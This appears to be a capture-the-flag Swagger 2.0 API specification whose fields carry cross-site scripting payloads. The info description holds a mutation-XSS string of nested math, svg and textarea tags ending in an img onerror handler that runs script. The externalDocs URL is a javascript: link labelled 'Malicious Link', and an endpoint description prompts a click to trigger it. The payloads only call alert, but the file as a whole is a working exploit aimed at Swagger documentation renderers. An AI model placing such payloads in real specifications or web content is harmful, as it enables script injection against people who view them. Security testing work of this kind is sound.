swagger: "2.0"
info:
  version: "1.0.0"
  title: "CTF Swagger API"
  description: "<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">"
host: "https://api.mrgreen.com/"
schemes:
  - "http"
paths:
  /example:
    get:
      summary: "Example Endpoint"
      description: "Click the link to trigger the payload."
      responses:
        200:
          description: "Successful Response"
          schema:
            type: "string"
      externalDocs:
        description: "Malicious Link"
        url: "javascript:alert('XSS Exploit')"
